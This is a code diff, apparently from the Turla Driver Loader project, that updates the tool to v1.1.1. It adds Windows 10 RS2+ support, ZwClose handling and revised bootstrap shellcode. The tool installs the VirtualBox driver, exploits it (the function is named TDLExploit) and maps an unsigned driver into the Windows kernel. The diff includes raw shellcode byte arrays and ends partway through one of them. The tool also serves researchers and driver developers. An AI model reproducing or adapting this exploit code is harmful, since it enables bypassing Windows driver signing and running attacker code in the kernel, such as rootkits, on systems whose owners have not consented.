DbgPrint("%s", __FUNCTION__); DbgPrint("%s\n", __FUNCTION__);
#endif #endif
RtlInitUnicodeString(&DevName, szDevName); RtlInitUnicodeString(&DevName, L"\\Device\\TDLD");
status = IoCreateDevice(DriverObject, 0, &DevName, FILE_DEVICE_UNKNOWN, FILE_DEVICE_SECURE_OPEN, TRUE, &devobj); status = IoCreateDevice(DriverObject, 0, &DevName, FILE_DEVICE_UNKNOWN, FILE_DEVICE_SECURE_OPEN, TRUE, &devobj);
#ifdef DEBUGPRINT #ifdef DEBUGPRINT
DbgPrint("%s IoCreateDevice(%wZ) = %lx", __FUNCTION__, DevName, status); DbgPrint("%s IoCreateDevice(%wZ) = %lx\n", __FUNCTION__, DevName, status);
#endif #endif
if (!NT_SUCCESS(status)) { if (!NT_SUCCESS(status)) {
return status; return status;
} }
RtlInitUnicodeString(&SymLink, szSymLink); RtlInitUnicodeString(&SymLink, L"\\DosDevices\\TDLD");
status = IoCreateSymbolicLink(&SymLink, &DevName); status = IoCreateSymbolicLink(&SymLink, &DevName);
#ifdef DEBUGPRINT #ifdef DEBUGPRINT
DbgPrint("%s IoCreateSymbolicLink(%wZ) = %lx", __FUNCTION__, SymLink, status); DbgPrint("%s IoCreateSymbolicLink(%wZ) = %lx\n", __FUNCTION__, SymLink, status);
#endif #endif
devobj->Flags |= DO_BUFFERED_IO; devobj->Flags |= DO_BUFFERED_IO;
@ -246,17 +269,6 @@ NTSTATUS DriverInitialize(
DriverObject->DriverUnload = NULL; //nonstandard way of driver loading, no unload DriverObject->DriverUnload = NULL; //nonstandard way of driver loading, no unload
devobj->Flags &= ~DO_DEVICE_INITIALIZING; devobj->Flags &= ~DO_DEVICE_INITIALIZING;
/*
RtlInitUnicodeString(&DrvRefName, szNullDrv);
if (NT_SUCCESS(ObReferenceObjectByName(&DrvRefName, OBJ_CASE_INSENSITIVE, NULL, 0,
*IoDriverObjectType, KernelMode, NULL, &driverObject)))
{
DbgPrint("drvObj %p", driverObject);
ListModules(driverObject);
ObDereferenceObject(driverObject);
}
*/
return status; return status;
} }
@ -275,21 +287,22 @@ NTSTATUS DriverEntry(
{ {
NTSTATUS status; NTSTATUS status;
UNICODE_STRING drvName; UNICODE_STRING drvName;
WCHAR szDrvName[] = { L'\\', L'D', L'r', L'i', L'v', L'e', L'r', L'\\', L'T', L'D', L'L', L'D', 0 };
/* This parameters are invalid due to nonstandard way of loading and should not be used. */ /* This parameters are invalid due to nonstandard way of loading and should not be used. */
UNREFERENCED_PARAMETER(DriverObject); UNREFERENCED_PARAMETER(DriverObject);
UNREFERENCED_PARAMETER(RegistryPath); UNREFERENCED_PARAMETER(RegistryPath);
PrintIrql();
#ifdef DEBUGPRINT #ifdef DEBUGPRINT
DbgPrint("%s", __FUNCTION__); DbgPrint("%s\n", __FUNCTION__);
#endif #endif
RtlInitUnicodeString(&drvName, szDrvName); RtlInitUnicodeString(&drvName, L"\\Driver\\TDLD");
status = IoCreateDriver(&drvName, &DriverInitialize); status = IoCreateDriver(&drvName, &DriverInitialize);
#ifdef DEBUGPRINT #ifdef DEBUGPRINT
DbgPrint("%s IoCreateDriver(%wZ) = %lx", __FUNCTION__, drvName, status); DbgPrint("%s IoCreateDriver(%wZ) = %lx\n", __FUNCTION__, drvName, status);
#endif #endif
return status; return status;

43
Source/DummyDrv2/dummy/main.h
View File

@ -1,12 +1,12 @@
/******************************************************************************* /*******************************************************************************
* *
* (C) COPYRIGHT AUTHORS, 2016 * (C) COPYRIGHT AUTHORS, 2016 - 2017
* *
* TITLE: MAIN.H * TITLE: MAIN.H
* *
* VERSION: 1.00 * VERSION: 1.01
* *
* DATE: 29 Jan 2016 * DATE: 20 Apr 2017
* *
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF * THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED * ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
@ -24,21 +24,6 @@ IoCreateDriver(
IN PDRIVER_INITIALIZE InitializationFunction IN PDRIVER_INITIALIZE InitializationFunction
); );
NTKERNELAPI
NTSTATUS
ObReferenceObjectByName(
__in PUNICODE_STRING ObjectName,
__in ULONG Attributes,
__in_opt PACCESS_STATE AccessState,
__in_opt ACCESS_MASK DesiredAccess,
__in POBJECT_TYPE ObjectType,
__in KPROCESSOR_MODE AccessMode,
__inout_opt PVOID ParseContext,
__out PVOID *Object
);
extern POBJECT_TYPE *IoDriverObjectType;
_Dispatch_type_(IRP_MJ_DEVICE_CONTROL) _Dispatch_type_(IRP_MJ_DEVICE_CONTROL)
DRIVER_DISPATCH DevioctlDispatch; DRIVER_DISPATCH DevioctlDispatch;
_Dispatch_type_(IRP_MJ_CREATE) _Dispatch_type_(IRP_MJ_CREATE)
@ -88,25 +73,3 @@ typedef struct _INOUT_PARAM {
ULONG Param3; ULONG Param3;
ULONG Param4; ULONG Param4;
} INOUT_PARAM, *PINOUTPARAM; } INOUT_PARAM, *PINOUTPARAM;
typedef struct _KLDR_DATA_TABLE_ENTRY {
LIST_ENTRY InLoadOrderLinks;
PVOID ExceptionTable;
ULONG ExceptionTableSize;
// ULONG padding on IA64
PVOID GpValue;
PVOID NonPagedDebugInfo;
PVOID DllBase;
PVOID EntryPoint;
ULONG SizeOfImage;
UNICODE_STRING FullDllName;
UNICODE_STRING BaseDllName;
ULONG Flags;
USHORT LoadCount;
USHORT __Unused5;
PVOID SectionPointer;
ULONG CheckSum;
// ULONG padding on IA64
PVOID LoadedImports;
PVOID PatchInformation;
} KLDR_DATA_TABLE_ENTRY, *PKLDR_DATA_TABLE_ENTRY;

12
Source/Furutaka/Furutaka.vcxproj
View File

@ -53,7 +53,7 @@
<LinkIncremental>false</LinkIncremental> <LinkIncremental>false</LinkIncremental>
<OutDir>.\output\$(Platform)\$(Configuration)\</OutDir> <OutDir>.\output\$(Platform)\$(Configuration)\</OutDir>
<IntDir>.\output\$(Platform)\$(Configuration)\</IntDir> <IntDir>.\output\$(Platform)\$(Configuration)\</IntDir>
<CodeAnalysisRuleSet>NativeRecommendedRules.ruleset</CodeAnalysisRuleSet> <CodeAnalysisRuleSet>AllRules.ruleset</CodeAnalysisRuleSet>
<RunCodeAnalysis>false</RunCodeAnalysis> <RunCodeAnalysis>false</RunCodeAnalysis>
</PropertyGroup> </PropertyGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'"> <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
@ -78,23 +78,23 @@
<WarningLevel>Level4</WarningLevel> <WarningLevel>Level4</WarningLevel>
<PrecompiledHeader> <PrecompiledHeader>
</PrecompiledHeader> </PrecompiledHeader>
<Optimization>MaxSpeed</Optimization> <Optimization>Full</Optimization>
<FunctionLevelLinking>true</FunctionLevelLinking> <FunctionLevelLinking>true</FunctionLevelLinking>
<IntrinsicFunctions>true</IntrinsicFunctions> <IntrinsicFunctions>true</IntrinsicFunctions>
<PreprocessorDefinitions>NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions> <PreprocessorDefinitions>NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<SDLCheck>true</SDLCheck>
<CompileAs>CompileAsC</CompileAs> <CompileAs>CompileAsC</CompileAs>
<MultiProcessorCompilation>true</MultiProcessorCompilation> <MultiProcessorCompilation>true</MultiProcessorCompilation>
<StringPooling>true</StringPooling> <StringPooling>true</StringPooling>
<EnablePREfast>false</EnablePREfast> <EnablePREfast>false</EnablePREfast>
<ControlFlowGuard>Guard</ControlFlowGuard> <RuntimeLibrary>MultiThreadedDLL</RuntimeLibrary>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary> <FavorSizeOrSpeed>Neither</FavorSizeOrSpeed>
<SDLCheck>true</SDLCheck>
</ClCompile> </ClCompile>
<Link> <Link>
<SubSystem>Console</SubSystem> <SubSystem>Console</SubSystem>
<EnableCOMDATFolding>true</EnableCOMDATFolding> <EnableCOMDATFolding>true</EnableCOMDATFolding>
<OptimizeReferences>true</OptimizeReferences> <OptimizeReferences>true</OptimizeReferences>
<GenerateDebugInformation>true</GenerateDebugInformation> <GenerateDebugInformation>false</GenerateDebugInformation>
<EntryPointSymbol>TDLMain</EntryPointSymbol> <EntryPointSymbol>TDLMain</EntryPointSymbol>
<SetChecksum>true</SetChecksum> <SetChecksum>true</SetChecksum>
<UACExecutionLevel>RequireAdministrator</UACExecutionLevel> <UACExecutionLevel>RequireAdministrator</UACExecutionLevel>

4
Source/Furutaka/global.h
View File

@ -4,9 +4,9 @@
* *
* TITLE: GLOBAL.H * TITLE: GLOBAL.H
* *
* VERSION: 1.10 * VERSION: 1.11
* *
* DATE: 17 Apr 2017 * DATE: 20 Apr 2017
* *
* Common header file for the program support routines. * Common header file for the program support routines.
* *

105
Source/Furutaka/main.c
View File

@ -4,9 +4,9 @@
* *
* TITLE: MAIN.C * TITLE: MAIN.C
* *
* VERSION: 1.10 * VERSION: 1.11
* *
* DATE: 17 Apr 2017 * DATE: 20 Apr 2017
* *
* Furutaka entry point. * Furutaka entry point.
* *
@ -34,17 +34,18 @@ BOOL g_ConsoleOutput = FALSE;
BOOL g_VBoxInstalled = FALSE; BOOL g_VBoxInstalled = FALSE;
WCHAR g_BE = 0xFEFF; WCHAR g_BE = 0xFEFF;
ULONG g_NtBuildNumber = 0;
#define VBoxDrvSvc TEXT("VBoxDrv") #define VBoxDrvSvc TEXT("VBoxDrv")
#define supImageName "furutaka" #define supImageName "furutaka"
#define supImageHandle 0x1a000 #define supImageHandle 0x1a000
#define PAGE_SIZE 0x1000 #define PAGE_SIZE 0x1000
#define scDataOffset 0x214 //shellcode data offset
#define T_LOADERTITLE TEXT("Turla Driver Loader v1.1 (17/04/17)") #define T_LOADERTITLE TEXT("Turla Driver Loader v1.1.1 (20/04/17)")
#define T_LOADERUNSUP TEXT("Unsupported WinNT version\r\n") #define T_LOADERUNSUP TEXT("Unsupported WinNT version\r\n")
#define T_LOADERRUN TEXT("Another instance running, close it before\r\n") #define T_LOADERRUN TEXT("Another instance running, close it before\r\n")
#define T_LOADERUSAGE TEXT("Usage: loader drivertoload\n\re.g. loader mydrv.sys\r\n") #define T_LOADERUSAGE TEXT("Usage: loader drivertoload\n\re.g. loader mydrv.sys\r\n")
#define T_LOADERINTRO TEXT("Turla Driver Loader v1.1.0 started\r\n(c) 2016 - 2017 TDL Project\r\nSupported x64 OS : 7 and above\r\n") #define T_LOADERINTRO TEXT("Turla Driver Loader v1.1.1 started\r\n(c) 2016 - 2017 TDL Project\r\nSupported x64 OS : 7 and above\r\n")
/* /*
* TDLVBoxInstalled * TDLVBoxInstalled
@ -83,8 +84,8 @@ BOOL TDLVBoxInstalled(
* *
*/ */
void TDLRelocImage( void TDLRelocImage(
ULONG_PTR Image, _In_ ULONG_PTR Image,
ULONG_PTR NewImageBase _In_ ULONG_PTR NewImageBase
) )
{ {
PIMAGE_OPTIONAL_HEADER popth; PIMAGE_OPTIONAL_HEADER popth;
@ -139,9 +140,9 @@ void TDLRelocImage(
* *
*/ */
ULONG_PTR TDLGetProcAddress( ULONG_PTR TDLGetProcAddress(
ULONG_PTR KernelBase, _In_ ULONG_PTR KernelBase,
ULONG_PTR KernelImage, _In_ ULONG_PTR KernelImage,
LPCSTR FunctionName _In_ LPCSTR FunctionName
) )
{ {
ANSI_STRING cStr; ANSI_STRING cStr;
@ -163,9 +164,9 @@ ULONG_PTR TDLGetProcAddress(
* *
*/ */
void TDLResolveKernelImport( void TDLResolveKernelImport(
ULONG_PTR Image, _In_ ULONG_PTR Image,
ULONG_PTR KernelImage, _In_ ULONG_PTR KernelImage,
ULONG_PTR KernelBase _In_ ULONG_PTR KernelBase
) )
{ {
PIMAGE_OPTIONAL_HEADER popth; PIMAGE_OPTIONAL_HEADER popth;
@ -211,8 +212,9 @@ void TDLResolveKernelImport(
* *
*/ */
void TDLExploit( void TDLExploit(
LPVOID Shellcode, _In_ LPVOID Shellcode,
ULONG CodeSize _In_ ULONG CodeSize,
_In_ ULONG DataOffset
) )
{ {
SUPCOOKIE Cookie; SUPCOOKIE Cookie;
@ -307,7 +309,7 @@ void TDLExploit(
ultohex(CodeSize, _strend(text)); ultohex(CodeSize, _strend(text));
_strcat(text, TEXT("\r\n\tDriver image mapped at 0x")); _strcat(text, TEXT("\r\n\tDriver image mapped at 0x"));
u64tohex((ULONG_PTR)ImageBase + scDataOffset, _strend(text)); u64tohex((ULONG_PTR)ImageBase + DataOffset, _strend(text));
cuiPrintText(g_ConOut, text, g_ConsoleOutput, TRUE); cuiPrintText(g_ConOut, text, g_ConsoleOutput, TRUE);
} }
@ -376,13 +378,14 @@ void TDLExploit(
* *
*/ */
UINT TDLMapDriver( UINT TDLMapDriver(
LPWSTR lpDriverFullName _In_ LPWSTR lpDriverFullName
) )
{ {
UINT result = (UINT)-1; UINT result = (UINT)-1;
ULONG isz; ULONG isz, prologueSize, dataOffset;
SIZE_T memIO; SIZE_T memIO;
ULONG_PTR KernelBase, KernelImage = 0, xExAllocatePoolWithTag = 0, xPsCreateSystemThread = 0; ULONG_PTR KernelBase, KernelImage = 0;
ULONG_PTR xExAllocatePoolWithTag = 0, xPsCreateSystemThread = 0, xZwClose = 0;
HMODULE Image = NULL; HMODULE Image = NULL;
PIMAGE_NT_HEADERS FileHeader; PIMAGE_NT_HEADERS FileHeader;
PBYTE Buffer = NULL; PBYTE Buffer = NULL;
@ -443,6 +446,7 @@ UINT TDLMapDriver(
cuiPrintText(g_ConOut, text, g_ConsoleOutput, TRUE); cuiPrintText(g_ConOut, text, g_ConsoleOutput, TRUE);
} }
if (g_NtBuildNumber < 15063) {
RtlInitString(&routineName, "PsCreateSystemThread"); RtlInitString(&routineName, "PsCreateSystemThread");
status = LdrGetProcedureAddress((PVOID)KernelImage, &routineName, 0, (PVOID)&xPsCreateSystemThread); status = LdrGetProcedureAddress((PVOID)KernelImage, &routineName, 0, (PVOID)&xPsCreateSystemThread);
if ((!NT_SUCCESS(status)) || (xPsCreateSystemThread == 0)) { if ((!NT_SUCCESS(status)) || (xPsCreateSystemThread == 0)) {
@ -455,6 +459,19 @@ UINT TDLMapDriver(
cuiPrintText(g_ConOut, text, g_ConsoleOutput, TRUE); cuiPrintText(g_ConOut, text, g_ConsoleOutput, TRUE);
} }
RtlInitString(&routineName, "ZwClose");
status = LdrGetProcedureAddress((PVOID)KernelImage, &routineName, 0, (PVOID)&xZwClose);
if ((!NT_SUCCESS(status)) || (xZwClose == 0)) {
cuiPrintText(g_ConOut, TEXT("Ldr: Error, ZwClose address not found"), g_ConsoleOutput, TRUE);
break;
}
else {
_strcpy(text, TEXT("Ldr: ZwClose 0x"));
u64tohex(KernelBase + (xZwClose - KernelImage), _strend(text));
cuiPrintText(g_ConOut, text, g_ConsoleOutput, TRUE);
}
}
memIO = isz + PAGE_SIZE; memIO = isz + PAGE_SIZE;
NtAllocateVirtualMemory(NtCurrentProcess(), (PVOID)&Buffer, 0, &memIO, NtAllocateVirtualMemory(NtCurrentProcess(), (PVOID)&Buffer, 0, &memIO,
MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
@ -470,25 +487,49 @@ UINT TDLMapDriver(
// mov rcx, ExAllocatePoolWithTag // mov rcx, ExAllocatePoolWithTag
// mov rdx, PsCreateSystemThread // mov rdx, PsCreateSystemThread
// mov r8, ZwClose
Buffer[0x00] = 0x48; // mov rcx, xxxxx Buffer[0x00] = 0x48; // mov rcx, xxxxx
Buffer[0x01] = 0xb9; Buffer[0x01] = 0xb9;
*((PULONG_PTR)&Buffer[2]) = *((PULONG_PTR)&Buffer[2]) =
KernelBase + (xExAllocatePoolWithTag - KernelImage); KernelBase + (xExAllocatePoolWithTag - KernelImage);
if (g_NtBuildNumber < 15063) {
Buffer[0x0a] = 0x48; // mov rdx, xxxxx Buffer[0x0a] = 0x48; // mov rdx, xxxxx
Buffer[0x0b] = 0xba; Buffer[0x0b] = 0xba;
*((PULONG_PTR)&Buffer[0x0c]) = *((PULONG_PTR)&Buffer[0x0c]) =
KernelBase + (xPsCreateSystemThread - KernelImage); KernelBase + (xPsCreateSystemThread - KernelImage);
Buffer[0x14] = 0x49; //mov r8, xxxxx
Buffer[0x15] = 0xb8;
*((PULONG_PTR)&Buffer[0x16]) =
KernelBase + (xZwClose - KernelImage);
RtlCopyMemory(Buffer + 0x14, prologueSize = 0x1e;
}
else {
prologueSize = 0x0a;
}
dataOffset = prologueSize + MAX_SHELLCODE_LENGTH;
if (g_NtBuildNumber < 15063) {
RtlCopyMemory(Buffer + prologueSize,
TDLBootstrapLoader_code, sizeof(TDLBootstrapLoader_code)); TDLBootstrapLoader_code, sizeof(TDLBootstrapLoader_code));
RtlCopyMemory(Buffer + scDataOffset, Image, isz); cuiPrintText(g_ConOut, TEXT("Ldr: Default bootstrap shellcode selected"), g_ConsoleOutput, TRUE);
}
else {
RtlCopyMemory(Buffer + prologueSize,
TDLBootstrapLoader_code_w10rs2, sizeof(TDLBootstrapLoader_code_w10rs2));
cuiPrintText(g_ConOut, TEXT("Ldr: Windows 10 RS2+ bootstrap shellcode selected"), g_ConsoleOutput, TRUE);
}
RtlCopyMemory(Buffer + dataOffset, Image, isz);
cuiPrintText(g_ConOut, TEXT("Ldr: Resolving kernel import"), g_ConsoleOutput, TRUE); cuiPrintText(g_ConOut, TEXT("Ldr: Resolving kernel import"), g_ConsoleOutput, TRUE);
TDLResolveKernelImport((ULONG_PTR)Buffer + scDataOffset, KernelImage, KernelBase); TDLResolveKernelImport((ULONG_PTR)Buffer + dataOffset, KernelImage, KernelBase);
cuiPrintText(g_ConOut, TEXT("Ldr: Executing exploit"), g_ConsoleOutput, TRUE); cuiPrintText(g_ConOut, TEXT("Ldr: Executing exploit"), g_ConsoleOutput, TRUE);
TDLExploit(Buffer, isz + PAGE_SIZE); TDLExploit(Buffer, isz + PAGE_SIZE, dataOffset);
result = 0; result = 0;
break; break;
} }
@ -575,14 +616,15 @@ HANDLE TDLStartVulnerableDriver(
} }
} }
//if vbox installed backup it driver, do it before dropping our //
// If vbox installed backup it driver, do it before dropping our
// Ignore error if file not found
//
if (g_VBoxInstalled) { if (g_VBoxInstalled) {
if (supBackupVBoxDrv(FALSE) == FALSE) { if (supBackupVBoxDrv(FALSE) == FALSE) {
cuiPrintText(g_ConOut, cuiPrintText(g_ConOut,
TEXT("Ldr: Error while doing VirtualBox driver backup"), TEXT("Ldr: Error while doing VirtualBox driver backup"),
g_ConsoleOutput, TRUE); g_ConsoleOutput, TRUE);
break;
} }
} }
@ -717,7 +759,7 @@ void TDLStopVulnerableDriver(
* *
*/ */
UINT TDLProcessCommandLine( UINT TDLProcessCommandLine(
LPWSTR lpCommandLine _In_ LPWSTR lpCommandLine
) )
{ {
UINT retVal = (UINT)-1; UINT retVal = (UINT)-1;
@ -765,7 +807,7 @@ void TDLMain()
UINT uResult = 0; UINT uResult = 0;
DWORD dwTemp; DWORD dwTemp;
LONG x; LONG x;
OSVERSIONINFOW osv; OSVERSIONINFO osv;
WCHAR text[256]; WCHAR text[256];
__security_init_cookie(); __security_init_cookie();
@ -795,7 +837,6 @@ void TDLMain()
T_LOADERINTRO, T_LOADERINTRO,
g_ConsoleOutput, TRUE); g_ConsoleOutput, TRUE);
x = InterlockedIncrement((PLONG)&g_lApplicationInstances); x = InterlockedIncrement((PLONG)&g_lApplicationInstances);
if (x > 1) { if (x > 1) {
cuiPrintText(g_ConOut, cuiPrintText(g_ConOut,
@ -817,6 +858,8 @@ void TDLMain()
break; break;
} }
g_NtBuildNumber = osv.dwBuildNumber;
_strcpy(text, TEXT("Ldr: Windows v")); _strcpy(text, TEXT("Ldr: Windows v"));
ultostr(osv.dwMajorVersion, _strend(text)); ultostr(osv.dwMajorVersion, _strend(text));
_strcat(text, TEXT(".")); _strcat(text, TEXT("."));
@ -825,6 +868,10 @@ void TDLMain()
ultostr(osv.dwBuildNumber, _strend(text)); ultostr(osv.dwBuildNumber, _strend(text));
cuiPrintText(g_ConOut, text, g_ConsoleOutput, TRUE); cuiPrintText(g_ConOut, text, g_ConsoleOutput, TRUE);
//
// If VirtualBox installed on the same machine warn user,
// however this is unnecessary can lead to any conflicts.
//
g_VBoxInstalled = TDLVBoxInstalled(); g_VBoxInstalled = TDLVBoxInstalled();
if (g_VBoxInstalled) { if (g_VBoxInstalled) {
cuiPrintText(g_ConOut, cuiPrintText(g_ConOut,

BIN
Source/Furutaka/resource.rc
View File

Binary file not shown.

180
Source/Furutaka/shellcode.h
View File

@ -4,9 +4,9 @@
* *
* TITLE: SHELLCODE.H * TITLE: SHELLCODE.H
* *
* VERSION: 1.10 * VERSION: 1.11
* *
* DATE: 17 Apr 2017 * DATE: 20 Apr 2017
* *
* Loader bootstrap shellcode. * Loader bootstrap shellcode.
* *
@ -22,8 +22,7 @@
typedef PVOID(NTAPI *PfnExAllocatePoolWithTag)( typedef PVOID(NTAPI *PfnExAllocatePoolWithTag)(
_In_ POOL_TYPE PoolType, _In_ POOL_TYPE PoolType,
_In_ SIZE_T NumberOfBytes, _In_ SIZE_T NumberOfBytes,
_In_ ULONG Tag _In_ ULONG Tag);
);
typedef NTSTATUS(NTAPI *PfnPsCreateSystemThread)( typedef NTSTATUS(NTAPI *PfnPsCreateSystemThread)(
_Out_ PHANDLE ThreadHandle, _Out_ PHANDLE ThreadHandle,
@ -32,8 +31,14 @@ typedef NTSTATUS(NTAPI *PfnPsCreateSystemThread)(
_In_opt_ HANDLE ProcessHandle, _In_opt_ HANDLE ProcessHandle,
_Out_opt_ PCLIENT_ID ClientId, _Out_opt_ PCLIENT_ID ClientId,
_In_ PKSTART_ROUTINE StartRoutine, _In_ PKSTART_ROUTINE StartRoutine,
_In_opt_ PVOID StartContext _In_opt_ PVOID StartContext);
);
typedef NTSTATUS (NTAPI *PfnZwClose)(
_In_ HANDLE Handle);
typedef NTSTATUS(NTAPI *PfnDriverEntry)();
#define MAX_SHELLCODE_LENGTH 0x300
/* /*
* TDLBootstrapLoader * TDLBootstrapLoader
@ -46,10 +51,11 @@ typedef NTSTATUS(NTAPI *PfnPsCreateSystemThread)(
/* /*
void TDLBootstrapLoader( void TDLBootstrapLoader(
PfnExAllocatePoolWithTag ExAllocatePoolWithTag, PfnExAllocatePoolWithTag ExAllocatePoolWithTag,
PfnPsCreateSystemThread PsCreateSystemThread) PfnPsCreateSystemThread PsCreateSystemThread,
PfnZwClose ZwClose)
{ {
ULONG_PTR pos, exbuffer, ULONG_PTR pos, exbuffer,
Image = ((ULONG_PTR)&TDLBootstrapLoader) + 0x200; Image = ((ULONG_PTR)&TDLBootstrapLoader) + MAX_SHELLCODE_LENGTH;
PIMAGE_DOS_HEADER dosh = (PIMAGE_DOS_HEADER)Image; PIMAGE_DOS_HEADER dosh = (PIMAGE_DOS_HEADER)Image;
PIMAGE_FILE_HEADER fileh = PIMAGE_FILE_HEADER fileh =
@ -110,36 +116,148 @@ void TDLBootstrapLoader(
for (pos = 0; pos < isz; pos++) for (pos = 0; pos < isz; pos++)
((PULONG64)exbuffer)[pos] = ((PULONG64)Image)[pos]; ((PULONG64)exbuffer)[pos] = ((PULONG64)Image)[pos];
th = NULL;
InitializeObjectAttributes(&attr, NULL, OBJ_KERNEL_HANDLE, NULL, NULL); InitializeObjectAttributes(&attr, NULL, OBJ_KERNEL_HANDLE, NULL, NULL);
PsCreateSystemThread(&th, THREAD_ALL_ACCESS, &attr, NULL, NULL, if (NT_SUCCESS(PsCreateSystemThread(&th, THREAD_ALL_ACCESS, &attr, NULL, NULL,
(PKSTART_ROUTINE)(exbuffer + popth->AddressOfEntryPoint), NULL); (PKSTART_ROUTINE)(exbuffer + popth->AddressOfEntryPoint), NULL)))
{
ZwClose(th);
}
} }
*/ */
static const unsigned char TDLBootstrapLoader_code[415] = { const unsigned char TDLBootstrapLoader_code[480] = {
0x40, 0x53, 0x56, 0x41, 0x54, 0x41, 0x55, 0x41, 0x56, 0x48, 0x83, 0xEC, 0x70, 0x4C, 0x8B, 0xE2, 0x48, 0x8B, 0xC4, 0x41, 0x54, 0x48, 0x81, 0xEC, 0x90, 0x00, 0x00, 0x00, 0x48, 0x89, 0x58, 0x10,
0x4C, 0x89, 0xBC, 0x24, 0xB8, 0x00, 0x00, 0x00, 0x4C, 0x8B, 0xC9, 0x48, 0x8D, 0x1D, 0xDE, 0xFF, 0x4D, 0x8B, 0xE0, 0x48, 0x89, 0x68, 0x18, 0x48, 0x8D, 0x1D, 0xE2, 0xFF, 0xFF, 0xFF, 0x4C, 0x89,
0xFF, 0xFF, 0x48, 0x81, 0xC3, 0x00, 0x02, 0x00, 0x00, 0x33, 0xC9, 0x41, 0xB8, 0x54, 0x64, 0x6C, 0x68, 0xE8, 0x48, 0x81, 0xC3, 0x00, 0x03, 0x00, 0x00, 0x4C, 0x89, 0x70, 0xE0, 0x4C, 0x8B, 0xEA,
0x53, 0x4C, 0x63, 0x73, 0x3C, 0x4C, 0x03, 0xF3, 0x45, 0x8B, 0x7E, 0x50, 0x41, 0x8D, 0x97, 0x00, 0x4C, 0x89, 0x78, 0xD8, 0x4C, 0x8B, 0xC9, 0x33, 0xC9, 0x41, 0xB8, 0x54, 0x64, 0x6C, 0x53, 0x4C,
0x10, 0x00, 0x00, 0x41, 0xFF, 0xD1, 0x45, 0x33, 0xED, 0x48, 0x8D, 0xB0, 0x00, 0x10, 0x00, 0x00, 0x63, 0x73, 0x3C, 0x4C, 0x03, 0xF3, 0x45, 0x8B, 0x7E, 0x50, 0x41, 0x8D, 0x97, 0x00, 0x10, 0x00,
0x48, 0x81, 0xE6, 0x00, 0xF0, 0xFF, 0xFF, 0x41, 0x83, 0xBE, 0x84, 0x00, 0x00, 0x00, 0x05, 0x0F, 0x00, 0x41, 0xFF, 0xD1, 0x45, 0x33, 0xC9, 0x48, 0x8D, 0xA8, 0x00, 0x10, 0x00, 0x00, 0x48, 0x81,
0x86, 0xAB, 0x00, 0x00, 0x00, 0x41, 0x8B, 0x8E, 0xB0, 0x00, 0x00, 0x00, 0x85, 0xC9, 0x0F, 0x84, 0xE5, 0x00, 0xF0, 0xFF, 0xFF, 0x41, 0x83, 0xBE, 0x84, 0x00, 0x00, 0x00, 0x05, 0x0F, 0x86, 0xB0,
0x9C, 0x00, 0x00, 0x00, 0x48, 0x89, 0xAC, 0x24, 0xA8, 0x00, 0x00, 0x00, 0x4C, 0x8D, 0x04, 0x0B, 0x00, 0x00, 0x00, 0x41, 0x8B, 0x8E, 0xB0, 0x00, 0x00, 0x00, 0x85, 0xC9, 0x0F, 0x84, 0xA1, 0x00,
0x41, 0x8B, 0xAE, 0xB4, 0x00, 0x00, 0x00, 0x4C, 0x8B, 0xDE, 0x4D, 0x2B, 0x5E, 0x30, 0x48, 0x89, 0x00, 0x00, 0x48, 0x89, 0xB4, 0x24, 0xB8, 0x00, 0x00, 0x00, 0x4C, 0x8D, 0x04, 0x0B, 0x41, 0x8B,
0xBC, 0x24, 0xB0, 0x00, 0x00, 0x00, 0x41, 0x8B, 0xFD, 0x85, 0xED, 0x74, 0x63, 0x0F, 0x1F, 0x00, 0xB6, 0xB4, 0x00, 0x00, 0x00, 0x4C, 0x8B, 0xDD, 0x4D, 0x2B, 0x5E, 0x30, 0x48, 0x89, 0xBC, 0x24,
0x88, 0x00, 0x00, 0x00, 0x41, 0x8B, 0xF9, 0x85, 0xF6, 0x74, 0x68, 0x0F, 0x1F, 0x44, 0x00, 0x00,
0x41, 0xB9, 0x08, 0x00, 0x00, 0x00, 0x4D, 0x8D, 0x50, 0x08, 0x45, 0x39, 0x48, 0x04, 0x76, 0x43, 0x41, 0xB9, 0x08, 0x00, 0x00, 0x00, 0x4D, 0x8D, 0x50, 0x08, 0x45, 0x39, 0x48, 0x04, 0x76, 0x43,
0x41, 0x0F, 0xB7, 0x02, 0x8B, 0xC8, 0xC1, 0xE9, 0x0C, 0x83, 0xF9, 0x03, 0x74, 0x17, 0x83, 0xF9, 0x41, 0x0F, 0xB7, 0x02, 0x8B, 0xC8, 0xC1, 0xE9, 0x0C, 0x83, 0xF9, 0x03, 0x74, 0x17, 0x83, 0xF9,
0x0A, 0x75, 0x22, 0x41, 0x8B, 0x10, 0x25, 0xFF, 0x0F, 0x00, 0x00, 0x48, 0x8D, 0x0C, 0x03, 0x4C, 0x0A, 0x75, 0x22, 0x41, 0x8B, 0x10, 0x25, 0xFF, 0x0F, 0x00, 0x00, 0x48, 0x8D, 0x0C, 0x03, 0x4C,
0x01, 0x1C, 0x0A, 0xEB, 0x10, 0x41, 0x8B, 0x10, 0x25, 0xFF, 0x0F, 0x00, 0x00, 0x48, 0x8D, 0x0C, 0x01, 0x1C, 0x0A, 0xEB, 0x10, 0x41, 0x8B, 0x10, 0x25, 0xFF, 0x0F, 0x00, 0x00, 0x48, 0x8D, 0x0C,
0x03, 0x44, 0x01, 0x1C, 0x0A, 0x49, 0x83, 0xC2, 0x02, 0x41, 0x83, 0xC1, 0x02, 0x45, 0x3B, 0x48, 0x03, 0x44, 0x01, 0x1C, 0x0A, 0x49, 0x83, 0xC2, 0x02, 0x41, 0x83, 0xC1, 0x02, 0x45, 0x3B, 0x48,
